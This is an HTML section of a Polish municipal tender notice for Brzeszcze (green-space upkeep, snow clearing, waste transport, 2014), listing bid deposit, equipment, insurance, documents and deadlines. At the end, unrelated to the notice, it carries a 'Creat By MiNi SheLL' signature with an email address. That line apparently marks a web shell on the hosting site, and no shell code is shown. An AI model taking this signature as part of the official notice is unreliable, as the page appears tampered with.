<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert 
w wysokości: 7000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga złożenia w ofercie: aktualnego odpisu z właściwego rejestru   lub z centralnej ewidencji i informacji o działalności gospodarczej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz          z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie.
Na potwierdzenie warunku posiadania przez Wykonawcę wiedzy                    i doświadczenia Wykonawca winien udokumentować  zrealizowanie              w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
przynajmniej jednej usługi utrzymania zieleni.Wartość zrealizowanej usługi  musi stanowić wartość    nie mniejszą niż 170 000,00 zł brutto, w ramach jednej umowy w ciągu jednego roku.
Ocena sposobu spełniania warunków przez wykonawcę przeprowadzona zostanie na podstawie załączonych dokumentów metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga złożenia w ofercie :Wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami.
Warunkiem spełnienia pkt. 10) jest wykazanie posiadania sprawnego sprzętu:

5  kos spalinowych 
3 nożyc spalinowych do żywopłotów
6 kosiarek spalinowych
4 dmuchaw do liści 
2 odśnieżarek spalinowych wirnikowych  do odśnieżania chodników 
1 kosiarki  do poboczy i rowów
1 pługa na urządzeniu przystosowanym do odsnieżania chodników o masie całkowitej do 3,5t
1 zamiatarki o wydajności co najmniej  11 000 m2/h
1 zamiatarki o wydajności co najmniej 7 000 m2/h
1 samochód śmieciarka o pojemności minimum 8 m3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na   kwotę nie mniejszą niż 500 tys. zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z europejskimi normami zarządzania środowiskiem, jeżeli zamawiający wskazują środki zarządzania środowiskiem, które wykonawca będzie stosował podczas realizacji zamówienia na roboty budowlane lub usługi, odwołując się do systemu zarządzania środowiskiem i audytu (EMAS) lub norm zarządzania środowiskiem opartych na europejskich lub międzynarodowych normach poświadczonych przez podmioty działające zgodnie z prawem Unii Europejskiej, europejskimi lub międzynarodowymi normami dotyczącymi certyfikacji;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">zamawiający wymaga złożenia w ofercie: Zezwolenia na transport odpadów  zgodnie z ustawą o odpadach (Dz. U. z 2013r. poz. 21 )
oraz :Zapewnienia z regionalnej instalacji przetwarzania odpadów komunalnych odbioru odpadów komunalnych,</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - termin płatności faktur - 1</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany dotyczące ustawowej zmiany podatku od towarów i usług VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeszcze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brzeszczach, ul. Kościelna 4, pok. nr 208.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2014 godzina 08:30, miejsce: Sekretariat lub Informatorium Urzędu Gminy w Brzeszczach ul. Kościelna 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com